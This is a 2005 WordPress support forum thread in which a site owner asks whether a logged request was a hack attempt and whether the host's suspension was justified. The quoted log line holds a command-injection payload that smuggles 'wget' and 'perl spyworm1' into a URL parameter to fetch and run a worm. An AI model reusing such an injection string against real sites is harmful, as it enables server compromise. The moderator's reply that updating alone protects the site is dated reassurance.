Support » Fixing WordPress » Was this a hack attempt? Did my web host over-react?

  • My site was down from about noon yesterday (CDT) until just now when I upgraded to WP 1.2.2.

    My webhost found this entry in my server logs and shut the site down: - - - [02/Jan/2005:12:06:57 -0500] "GET /index.php?p=;wget%20;perl%2
    0spyworm1;wget%20 HTTP/1.1" 403 - "-" "LWP::Simple/5.76"

    With the comment,

    That is not dealing with the Comment SPAM issue, that is an attempt to hack into your account. You need to make sure that you are running the latest version of the software and that all known security holes are patched. If you come into chat when you are ready to fix your site we can unsuspend your site.

    All’s well that ends well, I suppose, but what troubles me is that I had something gobble up 5GB of bandwidth a couple of weekends ago and posted my solution on my blog, part of which was to disallow, via the .htaccess file, the user agent LWP::Simple. Yet, it appears this was part and parcel of the hack/script/string cited above. Does this mean that .htaccess “trick” is not working? (Bandwidth usage has settled back down to normal again, at least.)

    Any thoughts as to anything further I might do to forestall such an occurrence in the future other than to always run the latest stable WP?


Viewing 1 replies (of 1 total)
  • Moderator James Huff


    Well, that is a known hack. And it is also known only to deface PHP pages. You have the latest version of WordPress, so you should be protected. If that isn’t good enough for them, move to a better host. They have no ground to suspend your account, especially for something that they clearly know nothing about.

    Dreamhost supports WordPress and they know a thing or two about it. They even provide a one-click installation method.

Viewing 1 replies (of 1 total)
  • The topic ‘Was this a hack attempt? Did my web host over-react?’ is closed to new replies.